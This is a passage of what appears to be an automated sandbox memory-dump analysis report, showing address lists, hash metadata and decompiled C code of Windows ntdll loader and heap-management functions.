                                                                            0x010e2a92
                                                                            0x010e2aa1
                                                                            0x010e2aa1
                                                                            0x010e2aa2
                                                                            0x010e2aab
                                                                            0x010e2ab0
                                                                            0x00000000
                                                                            0x010e2ab0
                                                                            0x010e2a94
                                                                            0x010e2a94
                                                                            0x00000000
                                                                            0x010e2a9c
                                                                            0x0109b5d4
                                                                            0x0109b5d4
                                                                            0x0109b5d6
                                                                            0x0109b5d9
                                                                            0x0109b5de
                                                                            0x0109b5e1
                                                                            0x0109b5e4
                                                                            0x010e2ab8
                                                                            0x010e2ab9
                                                                            0x010e2ac4
                                                                            0x010e2ac9
                                                                            0x0109b5f2
                                                                            0x0109b5f2
                                                                            0x0109b5f4
                                                                            0x0109b5f4
                                                                            0x00000000
                                                                            0x0109b5e4
                                                                            0x0109b5c4
                                                                            0x0109b554
                                                                            0x0109b554
                                                                            0x00000000
                                                                            0x0109b554

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 7073ce61a5ff90b72cc91d0ad0cd0018d5522f5ef5b65ca96d914feeeb380590
                                                                            • Instruction ID: d7e777325ba3bd7c6774ef423fe1a3a69945370b7053b403bb7679b7d39b6eca
                                                                            • Opcode Fuzzy Hash: 7073ce61a5ff90b72cc91d0ad0cd0018d5522f5ef5b65ca96d914feeeb380590
                                                                            • Instruction Fuzzy Hash: D7E19A70600205AFDB19CF69D8A4FBEBBF5FF48314F1481A9E5929B291D734E981CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E01088794(void* __ecx) {
                                                                            				signed int _v0;
                                                                            				char _v8;
                                                                            				signed int _v12;
                                                                            				void* _v16;
                                                                            				signed int _v20;
                                                                            				intOrPtr _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v40;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				intOrPtr* _t77;
                                                                            				signed int _t80;
                                                                            				signed char _t81;
                                                                            				signed int _t87;
                                                                            				signed int _t91;
                                                                            				void* _t92;
                                                                            				void* _t94;
                                                                            				signed int _t95;
                                                                            				signed int _t103;
                                                                            				signed int _t105;
                                                                            				signed int _t110;
                                                                            				signed int _t118;
                                                                            				intOrPtr* _t121;
                                                                            				intOrPtr _t122;
                                                                            				signed int _t125;
                                                                            				signed int _t129;
                                                                            				signed int _t131;
                                                                            				signed int _t134;
                                                                            				signed int _t136;
                                                                            				signed int _t143;
                                                                            				signed int* _t147;
                                                                            				signed int _t151;
                                                                            				void* _t153;
                                                                            				signed int* _t157;
                                                                            				signed int _t159;
                                                                            				signed int _t161;
                                                                            				signed int _t166;
                                                                            				signed int _t168;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t153 = __ecx;
                                                                            				_t159 = 0;
                                                                            				_t121 = __ecx + 0x3c;
                                                                            				if( *_t121 == 0) {
                                                                            					L2:
                                                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                            							L6:
                                                                            							if(E0108934A() != 0) {
                                                                            								_t159 = E010FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                            								__eflags = _t159;
                                                                            								if(_t159 < 0) {
                                                                            									_t81 =  *0x1165780; // 0x0
                                                                            									__eflags = _t81 & 0x00000003;
                                                                            									if((_t81 & 0x00000003) != 0) {
                                                                            										_push(_t159);
                                                                            										E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                            										_t81 =  *0x1165780; // 0x0
                                                                            									}
                                                                            									__eflags = _t81 & 0x00000010;
                                                                            									if((_t81 & 0x00000010) != 0) {
                                                                            										asm("int3");
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							_t159 = E0108849B(0, _t122, _t153, _t159, _t180);
                                                                            							if(_t159 >= 0) {
                                                                            								goto L6;
                                                                            							}
                                                                            						}
                                                                            						_t80 = _t159;
                                                                            						goto L8;
                                                                            					} else {
                                                                            						_t125 = 0x13;
                                                                            						asm("int 0x29");
                                                                            						_push(0);
                                                                            						_push(_t159);
                                                                            						_t161 = _t125;
                                                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                            						_t143 = 0;
                                                                            						_v40 = _t161;
                                                                            						_t118 = 0;
                                                                            						_push(_t153);
                                                                            						__eflags = _t87;
                                                                            						if(_t87 != 0) {
                                                                            							_t118 = _t87 + 0x5d8;
                                                                            							__eflags = _t118;
                                                                            							if(_t118 == 0) {
                                                                            								L46:
                                                                            								_t118 = 0;
                                                                            							} else {
                                                                            								__eflags =  *(_t118 + 0x30);
                                                                            								if( *(_t118 + 0x30) == 0) {
                                                                            									goto L46;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_v32 = 0;
                                                                            						_v28 = 0;
                                                                            						_v16 = 0;
                                                                            						_v20 = 0;
                                                                            						_v12 = 0;
                                                                            						__eflags = _t118;
                                                                            						if(_t118 != 0) {
                                                                            							__eflags = _t161;
                                                                            							if(_t161 != 0) {
                                                                            								__eflags =  *(_t118 + 8);
                                                                            								if( *(_t118 + 8) == 0) {
                                                                            									L22:
                                                                            									_t143 = 1;
                                                                            									__eflags = 1;
                                                                            								} else {
                                                                            									_t19 = _t118 + 0x40; // 0x40
                                                                            									_t156 = _t19;
                                                                            									E01088999(_t19,  &_v16);
                                                                            									__eflags = _v0;
                                                                            									if(_v0 != 0) {
                                                                            										__eflags = _v0 - 1;
                                                                            										if(_v0 != 1) {
                                                                            											goto L22;
                                                                            										} else {
                                                                            											_t128 =  *(_t161 + 0x64);
                                                                            											__eflags =  *(_t161 + 0x64);
                                                                            											if( *(_t161 + 0x64) == 0) {
                                                                            												goto L22;
                                                                            											} else {
                                                                            												E01088999(_t128,  &_v12);
                                                                            												_t147 = _v12;
                                                                            												_t91 = 0;
                                                                            												__eflags = 0;
                                                                            												_t129 =  *_t147;
                                                                            												while(1) {
                                                                            													__eflags =  *((intOrPtr*)(0x1165c60 + _t91 * 8)) - _t129;
                                                                            													if( *((intOrPtr*)(0x1165c60 + _t91 * 8)) == _t129) {
                                                                            														break;
                                                                            													}
                                                                            													_t91 = _t91 + 1;
                                                                            													__eflags = _t91 - 5;
                                                                            													if(_t91 < 5) {
                                                                            														continue;
                                                                            													} else {
                                                                            														_t131 = 0;
                                                                            														__eflags = 0;
                                                                            													}
                                                                            													L37:
                                                                            													__eflags = _t131;
                                                                            													if(_t131 != 0) {
                                                                            														goto L22;
                                                                            													} else {
                                                                            														__eflags = _v16 - _t147;
                                                                            														if(_v16 != _t147) {
                                                                            															goto L22;
                                                                            														} else {
                                                                            															E01092280(_t92, 0x11686cc);
                                                                            															_t94 = E01149DFB( &_v20);
                                                                            															__eflags = _t94 - 1;
                                                                            															if(_t94 != 1) {
                                                                            															}
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															 *_t118 =  *_t118 + 1;
                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                            															_t95 = E010A61A0( &_v32);
                                                                            															__eflags = _t95;
                                                                            															if(_t95 != 0) {
                                                                            																__eflags = _v32 | _v28;
                                                                            																if((_v32 | _v28) != 0) {
                                                                            																	_t71 = _t118 + 0x40; // 0x3f
                                                                            																	_t134 = _t71;
                                                                            																	goto L55;
                                                                            																}
                                                                            															}
                                                                            															goto L30;
                                                                            														}
                                                                            													}
                                                                            													goto L56;
                                                                            												}
                                                                            												_t92 = 0x1165c64 + _t91 * 8;
                                                                            												asm("lock xadd [eax], ecx");
                                                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                                                            												goto L37;
                                                                            											}
                                                                            										}
                                                                            										goto L56;
                                                                            									} else {
                                                                            										_t143 = E01088A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                            										__eflags = _t143;
                                                                            										if(_t143 != 0) {
                                                                            											_t157 = _v12;
                                                                            											_t103 = 0;
                                                                            											__eflags = 0;
                                                                            											_t136 =  &(_t157[1]);
                                                                            											 *(_t161 + 0x64) = _t136;
                                                                            											_t151 =  *_t157;
                                                                            											_v20 = _t136;
                                                                            											while(1) {
                                                                            												__eflags =  *((intOrPtr*)(0x1165c60 + _t103 * 8)) - _t151;
                                                                            												if( *((intOrPtr*)(0x1165c60 + _t103 * 8)) == _t151) {
                                                                            													break;
                                                                            												}
                                                                            												_t103 = _t103 + 1;
                                                                            												__eflags = _t103 - 5;
                                                                            												if(_t103 < 5) {
                                                                            													continue;
                                                                            												}
                                                                            												L21:
                                                                            												_t105 = E010BF380(_t136, 0x1051184, 0x10);
                                                                            												__eflags = _t105;
                                                                            												if(_t105 != 0) {
                                                                            													__eflags =  *_t157 -  *_v16;
                                                                            													if( *_t157 >=  *_v16) {
                                                                            														goto L22;
                                                                            													} else {
                                                                            														asm("cdq");
                                                                            														_t166 = _t157[5] & 0x0000ffff;
                                                                            														_t108 = _t157[5] & 0x0000ffff;
                                                                            														asm("cdq");
                                                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                            														if(__eflags > 0) {
                                                                            															L29:
                                                                            															E01092280(_t108, 0x11686cc);
                                                                            															 *_t118 =  *_t118 + 1;
                                                                            															_t42 = _t118 + 0x40; // 0x3f
                                                                            															_t156 = _t42;
                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															asm("movsd");
                                                                            															_t110 = E010A61A0( &_v32);
                                                                            															__eflags = _t110;
                                                                            															if(_t110 != 0) {
                                                                            																__eflags = _v32 | _v28;
                                                                            																if((_v32 | _v28) != 0) {
                                                                            																	_t134 = _v20;
                                                                            																	L55:
                                                                            																	E01149D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                            																}
                                                                            															}
                                                                            															L30:
                                                                            															 *_t118 =  *_t118 + 1;
                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                            															E0108FFB0(_t118, _t156, 0x11686cc);
                                                                            															goto L22;
                                                                            														} else {
                                                                            															if(__eflags < 0) {
                                                                            																goto L22;
                                                                            															} else {
                                                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                            																	goto L22;
                                                                            																} else {
                                                                            																	goto L29;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            													goto L56;
                                                                            												}
                                                                            												goto L22;
                                                                            											}
                                                                            											asm("lock inc dword [eax]");
                                                                            											goto L21;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						return _t143;
                                                                            					}
                                                                            				} else {
                                                                            					_push( &_v8);
                                                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                            					_push(__ecx + 0x40);
                                                                            					_push(_t121);
                                                                            					_push(0xffffffff);
                                                                            					_t80 = E010B9A00();
                                                                            					_t159 = _t80;
                                                                            					if(_t159 < 0) {
                                                                            						L8:
                                                                            						return _t80;
                                                                            					} else {
                                                                            						goto L2;
                                                                            					}
                                                                            				}
                                                                            				L56:
                                                                            			}












































                                                                            0x00000000

                                                                            Strings
                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 010D9C18
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010D9C28
                                                                            • LdrpDoPostSnapWork, xrefs: 010D9C1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 2994545307-1948996284
                                                                            • Opcode ID: bd69953d42077b8762e06f6e37c7d95aa3c3d2353acba0904c31911da0aa4a1f
                                                                            • Instruction ID: 7dce9404c318a497f2f174d83709cd0bafdcb3725b2f0df987364914db029d09
                                                                            • Opcode Fuzzy Hash: bd69953d42077b8762e06f6e37c7d95aa3c3d2353acba0904c31911da0aa4a1f
                                                                            • Instruction Fuzzy Hash: F1912931A0421ADFDF58EF59D480ABA77F5FF44314B8481AADAC1AB251DB31ED01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E010AAC7B(void* __ecx, signed short* __edx) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				void* __ebx;
                                                                            				signed char _t75;
                                                                            				signed int _t79;
                                                                            				signed int _t88;
                                                                            				intOrPtr _t89;
                                                                            				signed int _t96;
                                                                            				signed char* _t97;
                                                                            				intOrPtr _t98;
                                                                            				signed int _t101;
                                                                            				signed char* _t102;
                                                                            				intOrPtr _t103;
                                                                            				signed int _t105;
                                                                            				signed char* _t106;
                                                                            				signed int _t131;
                                                                            				signed int _t138;
                                                                            				void* _t149;
                                                                            				signed short* _t150;
                                                                            
                                                                            				_t150 = __edx;
                                                                            				_t149 = __ecx;
                                                                            				_t70 =  *__edx & 0x0000ffff;
                                                                            				__edx[1] = __edx[1] & 0x000000f8;
                                                                            				__edx[3] = 0;
                                                                            				_v8 =  *__edx & 0x0000ffff;
                                                                            				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                                            					_t39 =  &(_t150[8]); // 0x8
                                                                            					E010CD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                                            					__edx[1] = __edx[1] | 0x00000004;
                                                                            				}
                                                                            				_t75 =  *(_t149 + 0xcc) ^  *0x1168a68;
                                                                            				if(_t75 != 0) {
                                                                            					L4:
                                                                            					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                            						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                                            						_t79 =  *(_t149 + 0x50);
                                                                            						 *_t150 =  *_t150 ^ _t79;
                                                                            						return _t79;
                                                                            					}
                                                                            					return _t75;
                                                                            				} else {
                                                                            					_t9 =  &(_t150[0x80f]); // 0x1017
                                                                            					_t138 = _t9 & 0xfffff000;
                                                                            					_t10 =  &(_t150[0x14]); // 0x20
                                                                            					_v12 = _t138;
                                                                            					if(_t138 == _t10) {
                                                                            						_t138 = _t138 + 0x1000;
                                                                            						_v12 = _t138;
                                                                            					}
                                                                            					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                                            					if(_t75 > _t138) {
                                                                            						_v8 = _t75 - _t138;
                                                                            						_push(0x4000);
                                                                            						_push( &_v8);
                                                                            						_push( &_v12);
                                                                            						_push(0xffffffff);
                                                                            						_t131 = E010B96E0();
                                                                            						__eflags = _t131 - 0xc0000045;
                                                                            						if(_t131 == 0xc0000045) {
                                                                            							_t88 = E01123C60(_v12, _v8);
                                                                            							__eflags = _t88;
                                                                            							if(_t88 != 0) {
                                                                            								_push(0x4000);
                                                                            								_push( &_v8);
                                                                            								_push( &_v12);
                                                                            								_push(0xffffffff);
                                                                            								_t131 = E010B96E0();
                                                                            							}
                                                                            						}
                                                                            						_t89 =  *[fs:0x30];
                                                                            						__eflags = _t131;
                                                                            						if(_t131 < 0) {
                                                                            							__eflags =  *(_t89 + 0xc);
                                                                            							if( *(_t89 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push(_v8);
                                                                            							_push(_v12);
                                                                            							_push(_t149);
                                                                            							_t75 = E0107B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                                            							goto L4;
                                                                            						} else {
                                                                            							_t96 =  *(_t89 + 0x50);
                                                                            							_t132 = 0x7ffe0380;
                                                                            							__eflags = _t96;
                                                                            							if(_t96 != 0) {
                                                                            								__eflags =  *_t96;
                                                                            								if( *_t96 == 0) {
                                                                            									goto L10;
                                                                            								}
                                                                            								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                            								L11:
                                                                            								__eflags =  *_t97;
                                                                            								if( *_t97 != 0) {
                                                                            									_t98 =  *[fs:0x30];
                                                                            									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                                            									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                                            										E011314FB(_t132, _t149, _v12, _v8, 7);
                                                                            									}
                                                                            								}
                                                                            								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                                            								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                                            								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                                            								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                                            								_t101 =  *( *[fs:0x30] + 0x50);
                                                                            								__eflags = _t101;
                                                                            								if(_t101 != 0) {
                                                                            									__eflags =  *_t101;
                                                                            									if( *_t101 == 0) {
                                                                            										goto L13;
                                                                            									}
                                                                            									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                            									goto L14;
                                                                            								} else {
                                                                            									L13:
                                                                            									_t102 = _t132;
                                                                            									L14:
                                                                            									__eflags =  *_t102;
                                                                            									if( *_t102 != 0) {
                                                                            										_t103 =  *[fs:0x30];
                                                                            										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                                            										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                                            											__eflags = E01097D50();
                                                                            											if(__eflags != 0) {
                                                                            												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                            											}
                                                                            											E01131411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                                            										}
                                                                            									}
                                                                            									_t133 = 0x7ffe038a;
                                                                            									_t105 =  *( *[fs:0x30] + 0x50);
                                                                            									__eflags = _t105;
                                                                            									if(_t105 != 0) {
                                                                            										__eflags =  *_t105;
                                                                            										if( *_t105 == 0) {
                                                                            											goto L16;
                                                                            										}
                                                                            										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                            										goto L17;
                                                                            									} else {
                                                                            										L16:
                                                                            										_t106 = _t133;
                                                                            										L17:
                                                                            										__eflags =  *_t106;
                                                                            										if( *_t106 != 0) {
                                                                            											__eflags = E01097D50();
                                                                            											if(__eflags != 0) {
                                                                            												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                            											}
                                                                            											E01131411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                                            										}
                                                                            										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                                            										_t150[1] = _t75;
                                                                            										goto L4;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							L10:
                                                                            							_t97 = _t132;
                                                                            							goto L11;
                                                                            						}
                                                                            					} else {
                                                                            						goto L4;
                                                                            					}
                                                                            				}
                                                                            			}






















                                                                            0x010ea070
                                                                            0x010ea070
                                                                            0x010ea070
                                                                            0x010ea08d
                                                                            0x010ea08d
                                                                            0x010aada4
                                                                            0x010aada6
                                                                            0x00000000
                                                                            0x010aada6
                                                                            0x010aad8e
                                                                            0x010aad6d
                                                                            0x010aad3c
                                                                            0x010aad3c
                                                                            0x00000000
                                                                            0x010aad3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010aacd8

                                                                            Strings
                                                                            • HEAP: , xrefs: 010EA0BA
                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 010EA0CD
                                                                            • HEAP[%wZ]: , xrefs: 010EA0AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                            • API String ID: 0-1340214556
                                                                            • Opcode ID: bb0f1ed98a1b56965d770b172184e1116e82c7c947c99d94bd0da03b63dfcf37
                                                                            • Instruction ID: af7c8cd14edbbb4ec655767d6673609bd76cef529f42ef34f10bc1872ce41d29
                                                                            • Opcode Fuzzy Hash: bb0f1ed98a1b56965d770b172184e1116e82c7c947c99d94bd0da03b63dfcf37
                                                                            • Instruction Fuzzy Hash: 9781F731704684EFE726DBA8C888BAABBF4FF09714F0441A5E5D28B6D2D774E940CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                            			E0109B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                            				signed int _v8;
                                                                            				char _v12;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __ebp;
                                                                            				void* _t72;
                                                                            				char _t76;
                                                                            				signed char _t77;
                                                                            				intOrPtr* _t80;
                                                                            				unsigned int _t85;
                                                                            				signed int* _t86;
                                                                            				signed int _t88;
                                                                            				signed char _t89;
                                                                            				intOrPtr _t90;
                                                                            				intOrPtr _t101;
                                                                            				intOrPtr* _t111;
                                                                            				void* _t117;
                                                                            				intOrPtr* _t118;
                                                                            				signed int _t120;
                                                                            				signed char _t121;
                                                                            				intOrPtr* _t123;
                                                                            				signed int _t126;
                                                                            				intOrPtr _t136;
                                                                            				signed int _t139;
                                                                            				void* _t140;
                                                                            				signed int _t141;
                                                                            				void* _t147;
                                                                            
                                                                            				_t111 = _a4;
                                                                            				_t140 = __ecx;
                                                                            				_v8 = __edx;
                                                                            				_t3 = _t111 + 0x18; // 0x0
                                                                            				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                            				_t5 = _t111 - 8; // -32
                                                                            				_t141 = _t5;
                                                                            				 *(_t111 + 0x14) = _a8;
                                                                            				_t72 = 4;
                                                                            				 *(_t141 + 2) = 1;
                                                                            				 *_t141 = _t72;
                                                                            				 *((char*)(_t141 + 7)) = 3;
                                                                            				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                            				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                            					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                            					_v12 = _t76;
                                                                            					__eflags = _t76 - 0xfe;
                                                                            					if(_t76 >= 0xfe) {
                                                                            						_push(__edx);
                                                                            						_push(0);
                                                                            						E0113A80D(_t134, 3, _t141, __edx);
                                                                            						_t76 = _v12;
                                                                            					}
                                                                            				} else {
                                                                            					_t76 = 0;
                                                                            				}
                                                                            				 *((char*)(_t141 + 6)) = _t76;
                                                                            				if( *0x1168748 >= 1) {
                                                                            					__eflags = _a12 - _t141;
                                                                            					if(_a12 <= _t141) {
                                                                            						goto L4;
                                                                            					}
                                                                            					_t101 =  *[fs:0x30];
                                                                            					__eflags =  *(_t101 + 0xc);
                                                                            					if( *(_t101 + 0xc) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                            					E0107B150();
                                                                            					__eflags =  *0x1167bc8;
                                                                            					if(__eflags == 0) {
                                                                            						E01132073(_t111, 1, _t140, __eflags);
                                                                            					}
                                                                            					goto L3;
                                                                            				} else {
                                                                            					L3:
                                                                            					_t147 = _a12 - _t141;
                                                                            					L4:
                                                                            					if(_t147 != 0) {
                                                                            						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                            						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                            						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                            					}
                                                                            					_t135 =  *(_t111 + 0x14);
                                                                            					if( *(_t111 + 0x14) == 0) {
                                                                            						L12:
                                                                            						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                            						if(_t77 != 0) {
                                                                            							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                            						} else {
                                                                            							_t117 = _t140;
                                                                            						}
                                                                            						_t118 = _t117 + 0x38;
                                                                            						_t26 = _t111 + 8; // -16
                                                                            						_t80 = _t26;
                                                                            						_t136 =  *_t118;
                                                                            						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                            							_push(_t118);
                                                                            							_push(0);
                                                                            							E0113A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                            						} else {
                                                                            							 *_t80 = _t136;
                                                                            							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                            							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                            							 *_t118 = _t80;
                                                                            						}
                                                                            						_t120 = _v8;
                                                                            						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                            						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                            						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                            						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                            						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                            							__eflags =  *(_t140 + 0xb8);
                                                                            							if( *(_t140 + 0xb8) == 0) {
                                                                            								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                            								__eflags = _t88 - 2;
                                                                            								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                            								__eflags =  *0x1168720 & 0x00000001;
                                                                            								_t89 = _t88 & 0xffffff00 | ( *0x1168720 & 0x00000001) == 0x00000000;
                                                                            								__eflags = _t89 & _t121;
                                                                            								if((_t89 & _t121) != 0) {
                                                                            									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t85 =  *(_t111 + 0x14);
                                                                            						if(_t85 >= 0x7f000) {
                                                                            							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                            						}
                                                                            						_t86 = _a16;
                                                                            						 *_t86 = _t141 - _a12 >> 3;
                                                                            						return _t86;
                                                                            					} else {
                                                                            						_t90 = E0109B8E4(_t135);
                                                                            						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                            						if( *_t123 != _t90) {
                                                                            							_push(_t123);
                                                                            							_push( *_t123);
                                                                            							E0113A80D(0, 0xd, _t90, 0);
                                                                            						} else {
                                                                            							 *_t111 = _t90;
                                                                            							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                            							 *_t123 = _t111;
                                                                            							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                            						}
                                                                            						_t139 =  *(_t140 + 0xb8);
                                                                            						if(_t139 != 0) {
                                                                            							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                            							__eflags = _t93;
                                                                            							while(1) {
                                                                            								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                            								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                            									break;
                                                                            								}
                                                                            								_t126 =  *_t139;
                                                                            								__eflags = _t126;
                                                                            								if(_t126 != 0) {
                                                                            									_t139 = _t126;
                                                                            									continue;
                                                                            								}
                                                                            								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                            								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                            								break;
                                                                            							}
                                                                            							E0109E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                            						}
                                                                            						goto L12;
                                                                            					}
                                                                            				}
                                                                            			}
                                                                            0x0109b7cc
